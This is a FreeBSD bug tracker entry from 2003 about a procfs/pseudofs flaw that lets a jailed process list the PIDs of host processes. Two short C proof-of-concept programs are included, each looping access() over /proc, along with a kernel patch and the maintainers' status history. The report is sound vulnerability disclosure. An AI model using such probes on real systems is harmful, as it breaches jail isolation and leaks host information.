Bug 48156
| Summary: | Bug in procfs(5) closed in jail. | ||||||
|---|---|---|---|---|---|---|---|
| Product: | Base System | Reporter: | Pawel Jakub Dawidek <nick> | ||||
| Component: | kern | Assignee: | Pawel Jakub Dawidek <pjd> | ||||
| Status: | Closed FIXED | ||||||
| Severity: | Affects Only Me | ||||||
| Priority: | Normal | ||||||
| Version: | 4.7-STABLE | ||||||
| Hardware: | Any | ||||||
| OS: | Any | ||||||
| Attachments: |
|
||||||
Responsible Changed From-To: freebsd-bugs->des Assign to procfs maintainer On Mon, Feb 10, 2003 at 06:08:00PM +0100, Pawel Jakub Dawidek wrote:
+> >Number: 48156
+> >Category: kern
+> >Synopsis: Bug in procfs(5) closed in jail.
[...]
+> >Release: FreeBSD 4.7-STABLE i386
This problem also exists in pseudofs implementation in FreeBSD 5.x, because
pfs_access() function doesn't check if given file/directory is visible for
process.
This programm shows this leakage.
-----[ start ]-----
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/jail.h>
#define PID_MAX 99999
int
main(void)
{
struct jail j = { 0, "/", "test", 0 };
char filename[16];
unsigned i;
if (jail(&j) < 0 || chdir("/proc") != 0)
exit(EXIT_FAILURE);
printf("My PID: %u\n", getpid());
for (i = 0; i < PID_MAX; ++i) {
snprintf(filename, sizeof(filename), "%u", i);
if (access(filename, 0777) == 0)
printf("Process %u is running.\n", i);
}
exit(EXIT_SUCCESS);
}
-----[ end ]-----
This patch fix it. Patch against FreeBSD 5.1-CURRENT, kern.osreldate: 501102.
diff -upr /usr/src/sys/fs/pseudofs/pseudofs_vnops.c src/sys/fs/pseudofs/pseudofs_vnops.c
--- /usr/src/sys/fs/pseudofs/pseudofs_vnops.c Tue Jul 15 01:54:02 2003
+++ src/sys/fs/pseudofs/pseudofs_vnops.c Tue Jul 15 01:53:44 2003
@@ -101,10 +101,15 @@ static int
pfs_access(struct vop_access_args *va)
{
struct vnode *vn = va->a_vp;
+ struct pfs_vdata *pvd = (struct pfs_vdata *)vn->v_data;
+ struct pfs_node *pn = pvd->pvd_pn;
struct vattr vattr;
int error;
PFS_TRACE((((struct pfs_vdata *)vn->v_data)->pvd_pn->pn_name));
+
+ if (!pfs_visible(va->a_td, pn, pvd->pvd_pid))
+ PFS_RETURN (ENOENT);
error = VOP_GETATTR(vn, &vattr, va->a_cred, va->a_td);
if (error)
--
Pawel Jakub Dawidek pawel@dawidek.net
UNIX Systems Programmer/Administrator http://garage.freebsd.pl
Am I Evil? Yes, I Am! http://cerber.sourceforge.net
State Changed From-To: open->analyzed The problem is easily reproducable and the patch seems correct. Responsible Changed From-To: des->freebsd-bugs I have fixed pseudofs in -CURRENT, but have neither the time nor the inclination to fix procfs / linprocfs in -STABLE. State Changed From-To: analyzed->open Hard to believe freebsd-bugs is analizing this PR. Responsible Changed From-To: freebsd-bugs->pjd Pawel has a commit bit now. State Changed From-To: open->closed Problem doesn't exist in -CURRENT. |
There is a way to get list of running processes of main host when we are inside of jail and if procfs if mounted there. We can't get informations about running processes, but we can get their PIDs. Fix: This patch fix this bug and fix ps_showallprocs problem too. How-To-Repeat: This simple programm shows how this works: #include <stdio.h> #include <unistd.h> #include <sys/types.h> #include <sys/jail.h> #define PID_MAX 99999 int main(int argc, char *argv[]) { struct jail j = { 0, "/", "test", 0 }; char filename[16]; int i; if (jail(&j) != 0 || chdir("/proc") != 0) exit(1); for (i = 0; i < PID_MAX; ++i) { snprintf(filename, sizeof(filename), "%u", i); if (access(filename, 0) == 0) printf("Process %u is running.\n", i); } exit(0); }